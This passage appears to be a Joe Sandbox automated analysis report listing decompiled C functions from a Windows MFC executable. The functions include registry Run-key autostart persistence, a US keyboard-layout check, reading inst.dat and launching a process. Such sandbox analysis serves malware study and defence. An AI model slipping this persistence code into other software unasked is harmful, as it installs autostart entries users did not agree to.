    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$ProcessThread
    • String ID: __oxFrame.class__
    • API String ID: 3635926707-3739978297
    • Opcode ID: 62369c029c0a61409b76ad9760f942c92b8f02d39cefc21e6db5afb063a9013e
    • Instruction ID: 7e1c3c89b65c289cb3099e9c697ae78b5c1499a45dc08a2aeb80b7d05f38034f
    • Opcode Fuzzy Hash: 62369c029c0a61409b76ad9760f942c92b8f02d39cefc21e6db5afb063a9013e
    • Instruction Fuzzy Hash: DA31A471602128AFDB219F60EC49AEE77B8EB05351F4040ABF505A6150DF349F948F59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0042817C(void* __esi, void* __eflags, CHAR* _a4, intOrPtr _a8) {
    				void* _v8;
    				char _v72;
    				char _v352;
    				char _v612;
    				CHAR* _t45;
    
    				E00428249(); // @0x00428187
    				GetModuleFileNameA(0,  &_v612, 0x104); // @0x0042819b
    				lstrcpyA( &_v352,  &_v612); // @0x004281af
    				_t45 = _a4; // @0x004281b5
    				if( *_t45 != 0) { // @0x004281ba
    					lstrcatA( &_v352, " "); // @0x004281cf
    					lstrcatA( &_v352, _t45); // @0x004281d9
    				} // @0x004281db
    				E0042A6AA( &_v72, 0, 0); // @0x004281e2
    				 *(strrchr( &_v72, 0x2e)) = 0; // @0x004281f6
    				RegCreateKeyA((0 | _a8 != 0x00000001) + 0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",  &_v8); // @0x00428210
    				RegSetValueExA(_v8,  &_v72, 0, 1,  &_v352, lstrlenA( &_v352) + 1); // @0x00428236
    				return RegCloseKey(_v8); // @0x00428248
    			}

    APIs
      • Part of subcall function 00428249: strrchr.MSVCRT ref: 00428265
      • Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428284
      • Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 00428293
      • Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 0042829E
      • Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004282AE
      • Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 004282B7
      • Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 004282BC
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042819B
    • lstrcpyA.KERNEL32(?,?), ref: 004281AF
    • lstrcatA.KERNEL32(?,004541C8), ref: 004281CF
    • lstrcatA.KERNEL32(?,?), ref: 004281D9
    • strrchr.MSVCRT ref: 004281ED
    • RegCreateKeyA.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428210
    • lstrlenA.KERNEL32(?), ref: 0042821D
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00428236
    • RegCloseKey.ADVAPI32(?), ref: 0042823F
    Strings
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00428202
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: CloseValue$DeleteOpenlstrcatstrrchr$CreateFileModuleNamelstrcpylstrlen
    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • API String ID: 3785328975-3913687870
    • Opcode ID: 703e5a640901f32a746c41b41471c7f969fdfada5f4aac2c96669a2c21fbb7cc
    • Instruction ID: 29f1e0553c9cdc7b2c669a3b8a48eea1458520c317e9796395c3e976d93f0f52
    • Opcode Fuzzy Hash: 703e5a640901f32a746c41b41471c7f969fdfada5f4aac2c96669a2c21fbb7cc
    • Instruction Fuzzy Hash: 2F211AB690021CEFDB10DBE0DC8DEDE7B7CEB86306F1004A2B605E6151D6759A998B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0040B985() {
    				int _t18;
    				char** _t19;
    				signed int _t20;
    				int _t35;
    				CHAR* _t38;
    				void* _t40;
    
    				E0043E4E0(0x43fd50, _t40);
    				_t18 = GetKeyboardLayoutList(0x14, _t40 - 0x64);
    				_t35 = _t18;
    				if(_t35 != 0) {
    					_t38 = "00000409";
    					_t19 = GetKeyboardLayoutNameA(_t38);
    					_push(_t38);
    					L0043DE26();
    					 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
    					_push(4);
    					_push(_t40 - 0x10);
    					L0043E13E();
    					_t20 = strcmp( *_t19, "0409");
    					if(_t20 == 0) {
    						_push(1);
    						_pop(0);
    						if((_t20 & 0xffffff00 | _t35 == 0x00000000) == 0) {
    							goto L3;
    						}
    					}
    					L0043DD36();
    					 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
    					L0043DD36();
    					_t18 = 0xbadbad;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
    				return _t18;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040B98A
    • GetKeyboardLayoutList.USER32(00000014,?,00000002), ref: 0040B999
    • GetKeyboardLayoutNameA.USER32 ref: 0040B9AD
    • #537.MFC42(00000409), ref: 0040B9B7
    • #5710.MFC42(?,00000004,00000409), ref: 0040B9C8
    • strcmp.MSVCRT ref: 0040B9D4
    • #800.MFC42(?,00000004,00000409), ref: 0040B9F0
    • #800.MFC42(?,00000004,00000409), ref: 0040B9FC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800KeyboardLayout$#537#5710H_prologListNamestrcmp
    • String ID: 00000409$0409
    • API String ID: 2975956753-2673260605
    • Opcode ID: edc8e3bb83b6345c97c3937a199a8a7f54f4063021f613fcdd7c01fd508411ea
    • Instruction ID: 628ddd70bb0ee515d34ab87a973503fead1d398237ea043963dbeb7e1827e038
    • Opcode Fuzzy Hash: edc8e3bb83b6345c97c3937a199a8a7f54f4063021f613fcdd7c01fd508411ea
    • Instruction Fuzzy Hash: D9012232A012059BCB14EBA5ED52BEFB774EF59365F10053EF412A70D1DF384A048618
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0040DA41(void* __ecx) {
    				signed int _v0;
    				signed int _t23;
    				signed int _t24;
    				long _t30;
    				intOrPtr* _t33;
    				intOrPtr _t35;
    				void* _t53;
    				intOrPtr* _t54;
    				intOrPtr* _t55;
    
    				_t53 = __ecx;
    				_push(0x4550cc);
    				L0043E15C();
    				_t23 =  *(__ecx + 0x488);
    				if(_t23 < 0 || _t23 >=  *((intOrPtr*)(__ecx + 0x47c))) {
    					L6:
    					_t24 = _v0;
    					if(_t24 < 0 || _t24 >=  *((intOrPtr*)(_t53 + 0x47c))) {
    						goto L17;
    					} else {
    						_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x478)) + _t24 * 4));
    						if(_t54 == 0 ||  *_t54 == 0) {
    							goto L17;
    						} else {
    							_push( *((intOrPtr*)(_t54 + 0xc)));
    							L0043E15C();
    							if(IsWindow( *( *_t54 + 0x20)) == 0) {
    								_push(_t53);
    								_push( *( *_t54 + 0x60) & 0x0000ffff);
    								L0043E0BA();
    							}
    							if(IsWindow( *( *_t54 + 0x20)) != 0) {
    								_t33 = _t53 + 0x48c;
    								_push(1);
    								_push( *((intOrPtr*)(_t53 + 0x498)) -  *((intOrPtr*)(_t33 + 4)));
    								_push( *((intOrPtr*)(_t33 + 8)) -  *_t33);
    								_push( *((intOrPtr*)(_t53 + 0x490)));
    								_push( *_t33);
    								L0043E210();
    								_push(5);
    								L0043E0AE();
    								L0043DF9A();
    							}
    							_t30 = E0040D90E(_t53,  *_t54);
    							if(_t30 != 0) {
    								SendMessageA( *(_t53 + 0x454), 0x110b, 9, _t30);
    							}
    							return 1;
    						}
    					}
    				} else {
    					_t55 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x478)) + _t23 * 4));
    					if(_t55 == 0) {
    						L17:
    						return 0;
    					}
    					_t35 =  *_t55;
    					if(_t35 != 0 && IsWindow( *(_t35 + 0x20)) != 0) {
    						_push(0);
    						L0043E0AE();
    					}
    					goto L6;
    				}
    			}

    APIs
    • #6199.MFC42(004550CC,?,?,?,00000000,0040D8F6,?,?), ref: 0040DA54
    • IsWindow.USER32(?), ref: 0040DA8B
    • #6215.MFC42(00000000,?,?,00000000,0040D8F6,?,?), ref: 0040DA95
    • #6199.MFC42(?,004550CC,?,?,?,00000000,0040D8F6,?,?), ref: 0040DAD1
    • IsWindow.USER32(?), ref: 0040DADB
    • #2086.MFC42(?,?,?,?,00000000,0040D8F6,?,?), ref: 0040DAE9
    • IsWindow.USER32(?), ref: 0040DAF3
    • #4299.MFC42(?,?,?,?,00000001,?,?,00000000,0040D8F6,?,?), ref: 0040DB1B
    • #6215.MFC42(00000005,?,?,?,?,00000001,?,?,00000000,0040D8F6,?,?), ref: 0040DB24
    • #5981.MFC42(00000005,?,?,?,?,00000001,?,?,00000000,0040D8F6,?,?), ref: 0040DB2B
    • SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 0040DB4B
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$#6199#6215$#2086#4299#5981MessageSend
    • String ID:
    • API String ID: 2769750442-0
    • Opcode ID: 26b6cb1dc9397ba8bd9c65571e47e32130f481cb389635e11f7536dadd9c8c41
    • Instruction ID: f4f29075cbcf2ee3111aa79e1e0396b9851cfc8700016e88fb13fdddba9173e7
    • Opcode Fuzzy Hash: 26b6cb1dc9397ba8bd9c65571e47e32130f481cb389635e11f7536dadd9c8c41
    • Instruction Fuzzy Hash: 77318170700201AFCB24EFA5CC91F66F7B5BF48704F01056EA5599B2E5CB35E859CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E00427B73(void* __ecx) {
    				void* _t30;
    				void* _t34;
    				void* _t35;
    				void* _t58;
    				void* _t61;
    
    				_t30 = E0043E4E0(0x442e14, _t61);
    				_t58 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x64)) != 0 &&  *((intOrPtr*)(__ecx + 0x2720)) != 0 && ( *((intOrPtr*)(__ecx + 0x17f4)) == 0 ||  *((intOrPtr*)(__ecx + 0x68)) != 0)) {
    					L0043DDD8();
    					_push(_t61 - 0x10);
    					_push(0x42d);
    					 *(_t61 - 4) = 0;
    					L0043E2E2();
    					_push(E00429029(_t61 - 0x20, 0xe06d));
    					_t34 = _t61 - 0x1c;
    					_push(0x453690);
    					_push(_t34);
    					 *(_t61 - 4) = 1;
    					L0043E168();
    					 *(_t61 - 4) = 2;
    					_push(_t61 - 0x10);
    					_push(_t34);
    					_t35 = _t61 - 0x18;
    					_push(_t35);
    					L0043E282();
    					_push(0x5d);
    					_push(_t35);
    					 *(_t61 - 4) = 3;
    					_push(_t61 - 0x14);
    					L0043E14A();
    					 *(_t61 - 4) = 7;
    					L0043DD36();
    					 *(_t61 - 4) = 6;
    					L0043DD36();
    					 *(_t61 - 4) = 5;
    					L0043DD36();
    					E004207FC();
    					E004207D4(_t58 + 0x78,  *((intOrPtr*)(_t61 - 0x14)));
    					_t30 = E004207FC();
    					 *(_t61 - 4) = 0;
    					L0043DD36();
    					 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
    				return _t30;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00427B78
    • #540.MFC42 ref: 00427BAF
    • #3097.MFC42(0000042D,?), ref: 00427BC2
    • #926.MFC42(?,00453690,00000000,0000042D,?), ref: 00427BE5
    • #922.MFC42(?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427BF7
    • #923.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C07
    • #800.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C13
    • #800.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C1F
    • #800.MFC42(?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C2B
    • #800.MFC42(?,?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C51
    • #800.MFC42(?,?,00000000,0000005D,?,00000000,?,?,00453690,00000000,0000042D,?), ref: 00427C5D
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#3097#540#922#923#926H_prolog
    • String ID:
    • API String ID: 4233701136-0
    • Opcode ID: 3d31470087a3fe21e51d8ebe8a2a536c10d02f15494898ff5f4700071f82d017
    • Instruction ID: 27d25c4587f88064a11b2db2650742c316071f0c2dda3a31157d062046692efd
    • Opcode Fuzzy Hash: 3d31470087a3fe21e51d8ebe8a2a536c10d02f15494898ff5f4700071f82d017
    • Instruction Fuzzy Hash: D221A571D05299EADF15EBA1D995AEFBBB8AF08304F54045FE41273282DB7C1B04C629
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0040FEA7() {
    				void* _t28;
    				int _t34;
    				void* _t51;
    				void* _t53;
    
    				E0043E4E0(0x440448, _t51);
    				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0xc;
    				 *((intOrPtr*)(_t51 - 0x18)) = 0;
    				 *(_t51 - 4) = 0;
    				if(IsWindow( *(_t51 + 0xc)) == 0) {
    					 *(_t51 - 4) =  *(_t51 - 4) | 0xffffffff;
    					_push(0x4550cc);
    					L0043DE26();
    				} else {
    					_t28 = SendMessageA( *(_t51 + 0xc), 0xe, 0, 0);
    					_t6 = _t28 + 0xcb; // -197
    					_t34 = _t6;
    					_push(_t34);
    					L0043DD54();
    					 *(_t51 - 0x14) = _t28;
    					memset(_t28, 0, _t34);
    					SendMessageA( *(_t51 + 0xc), 0xd, _t28 + 0xca,  *(_t51 - 0x14));
    					_push( *(_t51 - 0x14));
    					L0043DE26();
    					_push( *(_t51 - 0x14));
    					 *(_t51 - 4) = 1;
    					L0043DD42();
    					_push(_t51 - 0x18);
    					L0043DD3C();
    					 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
    				return  *((intOrPtr*)(_t51 + 8));
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537MessageSend$#535#800#823#825H_prologWindowmemset
    • String ID:
    • API String ID: 4122110621-0
    • Opcode ID: 23993d4854425e3dcc026690f47edc555cd86d2ab34a631e2e7954795e248cdf
    • Instruction ID: 60101947856509e48fc33cbc23c6782d2f32d38ee5eee394c3ac170a4607c917
    • Opcode Fuzzy Hash: 23993d4854425e3dcc026690f47edc555cd86d2ab34a631e2e7954795e248cdf
    • Instruction Fuzzy Hash: B321AE71D01109BBDB10EFA5EC02BDEBF78EF48364F10412AF91866190DB784A04CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0041FCFE(intOrPtr __ecx) {
    				void* _t26;
    				void* _t28;
    				intOrPtr _t44;
    				void* _t49;
    				void* _t51;
    
    				E0043E4E0(0x441e10, _t49);
    				_t44 = __ecx;
    				_push(0);
    				 *((intOrPtr*)(_t49 - 0x18)) = __ecx;
    				L0043E43E();
    				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
    				 *((intOrPtr*)(__ecx)) = 0x448ec8;
    				GetModuleFileNameA(0, _t49 - 0x11c, 0x104);
    				_t26 = _t49 - 0x11c;
    				_push(_t26);
    				L0043DE26();
    				_push(0x5c);
    				 *(_t49 - 4) = 1;
    				L0043DFB8();
    				_push(_t26 + 1);
    				_t28 = _t49 - 0x10;
    				_push(_t28);
    				L0043DFD0();
    				_push(_t28);
    				 *(_t49 - 4) = 2;
    				L0043DFCA();
    				 *(_t49 - 4) = 1;
    				L0043DD36();
    				E0042AC90( *0x4558c8);
    				 *((intOrPtr*)(_t51 - 0x110)) = "dt";
    				_push(0x4558c8);
    				_push(_t49 - 0x10);
    				L0043DE20();
    				 *(_t49 - 4) = 3;
    				E0042AC90( *((intOrPtr*)(_t49 - 0x10)));
    				 *(_t49 - 4) = 1;
    				L0043DD36();
    				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
    				return _t44;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041FD03
    • #561.MFC42(00000000), ref: 0041FD17
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000000), ref: 0041FD34
    • #537.MFC42(?), ref: 0041FD44
    • #5683.MFC42(0000005C,?), ref: 0041FD52
    • #4129.MFC42(?,00000001,0000005C,?), ref: 0041FD60
    • #858.MFC42(00000000,?,00000001,0000005C,?), ref: 0041FD71
    • #800.MFC42(00000000,?,00000001,0000005C,?), ref: 0041FD7D
    • #924.MFC42(?,004558C8,00000000,?,00000001,0000005C,?), ref: 0041FD99
    • #800.MFC42(?,004558C8,00000000,?,00000001,0000005C,?), ref: 0041FDB1
    • #800.MFC42(?,004558C8,00000000,?,00000001,0000005C,?), ref: 0041FDBD
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#4129#537#561#5683#858#924FileH_prologModuleName
    • String ID:
    • API String ID: 2896541598-0
    • Opcode ID: 3d5fe76244ad4cca5594ffcdb1c71594d4c787554e279c8a67c0ed3bb671c066
    • Instruction ID: bc935da24354569579f41680415b5a9f50e7230db7298927da8b1228761cfb12
    • Opcode Fuzzy Hash: 3d5fe76244ad4cca5594ffcdb1c71594d4c787554e279c8a67c0ed3bb671c066
    • Instruction Fuzzy Hash: 7821C671D002599ADB01FB95D956BEEBB78EF29308F10445EF101A71C2DBBC0A08CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E004279C9(void* __ecx, void* __edx) {
    				char _v8;
    				long _v12;
    				char _v272;
    				intOrPtr _v732;
    				intOrPtr _v740;
    				void _v1268;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				int _t20;
    				void* _t26;
    				void* _t28;
    				void* _t34;
    				void* _t35;
    				void* _t38;
    
    				_t34 = __edx;
    				_t28 = __ecx;
    				lstrcpyA( &_v272,  *0x4558c8);
    				lstrcatA( &_v272, "inst.dat");
    				_t35 = CreateFileA( &_v272, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t35 == 0xffffffff) {
    					L5:
    					return 0;
    				}
    				if(GetFileSize(_t35, 0) == 0x3e4) {
    					_t20 = ReadFile(_t35,  &_v1268, 0x3e4,  &_v12, 0);
    					_push(_t35);
    					if(_t20 != 0) {
    						CloseHandle();
    						if(_v740 == 0) {
    							goto L5;
    						}
    						_push(0x3e4);
    						E00427A9F(_t38, _v732, 0, 0, 0);
    						E00427AC2(_t28 + 0x1a0c, _t38, 0x3e4);
    						_push( &_v8);
    						L0043E162();
    						if(L0042387B( &_v8, _t28, _t34, _t38, 0) == 0) {
    							goto L5;
    						}
    						_t26 = 1;
    						return _t26;
    					}
    					L4:
    					CloseHandle();
    					goto L5;
    				}
    				_push(_t35);
    				goto L4;
    			}

    APIs
    • lstrcpyA.KERNEL32(?), ref: 004279E4
    • lstrcatA.KERNEL32(?,inst.dat), ref: 004279F6
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00427A11
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00427A20
    • ReadFile.KERNEL32(00000000,?,000003E4,?,00000000), ref: 00427A40
    • CloseHandle.KERNEL32(00000000), ref: 00427A4B
    • CloseHandle.KERNEL32(00000000), ref: 00427A58
    • #3811.MFC42(?,?,?,00000000,00000000,00000000), ref: 00427A8A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: File$CloseHandle$#3811CreateReadSizelstrcatlstrcpy
    • String ID: inst.dat
    • API String ID: 3078242128-3562421779
    • Opcode ID: 303aae25589471d38981d2910a5f7c106e90ffe064a9ba0a741703533dd116ff
    • Instruction ID: aa19ae25e2d283c6323b81cf06509fe03560b4e33e8ee83ab1592fc80425d3ec
    • Opcode Fuzzy Hash: 303aae25589471d38981d2910a5f7c106e90ffe064a9ba0a741703533dd116ff
    • Instruction Fuzzy Hash: F721DB79645124BBDB209761EC4DFEF3BBCDF86771F400176B605D21C0D6748A41CA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 56%
    			E00427FB3(void* __ecx, void* __eflags) {
    				void* _t33;
    				intOrPtr* _t36;
    				intOrPtr* _t38;
    				void* _t47;
    				void* _t48;
    				void* _t50;
    				void* _t51;
    				void* _t53;
    
    				E0043E4E0(0x442ebc, _t53);
    				_t51 = __ecx;
    				memset(_t53 - 0x34, 0, 0x20);
    				E00429029(_t53 - 0x10, 0xe06f);
    				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
    				 *((intOrPtr*)(_t53 - 0x2c)) = _t53 - 0x138;
    				 *(_t53 - 0x34) =  *(_t51 + 0x20);
    				 *((intOrPtr*)(_t53 - 0x28)) =  *((intOrPtr*)(_t53 - 0x10));
    				_t33 = _t53 - 0x34;
    				 *((intOrPtr*)(_t53 - 0x24)) = 0x41;
    				__imp__SHBrowseForFolderA(_t33, _t47, _t50);
    				_t48 = _t33;
    				if(_t48 != 0) {
    					__imp__SHGetPathFromIDListA(_t48, _t53 - 0x138);
    					__imp__SHGetMalloc(_t53 - 0x14);
    					_t36 =  *((intOrPtr*)(_t53 - 0x14));
    					 *((intOrPtr*)( *_t36 + 0x14))(_t36, _t48);
    					_t38 =  *((intOrPtr*)(_t53 - 0x14));
    					 *((intOrPtr*)( *_t38 + 8))(_t38);
    					_t33 = _t53 - 0x138;
    					_push(_t33);
    					_push(0x494);
    					L0043E066();
    					L0043E15C();
    				}
    				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
    				return _t33;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00427FB8
    • memset.MSVCRT ref: 00427FCF
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • SHBrowseForFolderA.SHELL32(?), ref: 00428009
    • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0042801D
    • SHGetMalloc.SHELL32(?), ref: 00428027
    • #3092.MFC42(00000494,?), ref: 0042804E
    • #6199.MFC42(00000494,?), ref: 00428055
    • #800.MFC42 ref: 00428061
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #1168#3092#537#6199#800BrowseFolderFromH_prologListLoadMallocPathStringmemset
    • String ID: A
    • API String ID: 3241221674-3554254475
    • Opcode ID: ad8a5b0b3f746c3d6c02df60094eecce03406a51a92a44c67c1fcb0cd6ac5004
    • Instruction ID: f04a0cf993f65f4a15d9dfe7e6fd1065995f3679dd8ec938bbeaed0052bf45f2
    • Opcode Fuzzy Hash: ad8a5b0b3f746c3d6c02df60094eecce03406a51a92a44c67c1fcb0cd6ac5004
    • Instruction Fuzzy Hash: 7A218E75A00219AFCB10EBA5D949FEEBBB8EF49304F10006AF515E3281EB749A04CB24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00427AD1(void* __eflags) {
    				void* _t21;
    				void* _t36;
    
    				E0043E4E0(0x442de0, _t36);
    				E0042A660(_t36 - 0x16c, 1, 0);
    				_t21 = _t36 - 0x16c;
    				_push(_t21);
    				L0043DE26();
    				_push(" u");
    				_push(_t21);
    				 *(_t36 - 4) = 0;
    				_push(_t36 - 0x10);
    				L0043DE20();
    				 *(_t36 - 4) = 2;
    				L0043DD36();
    				memset(_t36 - 0x68, 0, 0x44);
    				 *(_t36 - 0x68) = 0x44;
    				if(CreateProcessA(0,  *(_t36 - 0x10), 0, 0, 0, 0, 0, 0, _t36 - 0x68, _t36 - 0x24) != 0) {
    					_push(1);
    					_pop(0);
    				}
    				 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return 0;
    			}





    Instruction addresses (one per decompiled statement above): 0x00427ad6, 0x00427aee, 0x00427af6, 0x00427aff, 0x00427b00, 0x00427b05, 0x00427b0a, 0x00427b0e, 0x00427b11, 0x00427b12, 0x00427b1a, 0x00427b1e, 0x00427b2a, 0x00427b35, 0x00427b53, 0x00427b55, 0x00427b57, 0x00427b57, 0x00427b58, 0x00427b5f, 0x00427b6a, 0x00427b72

    APIs
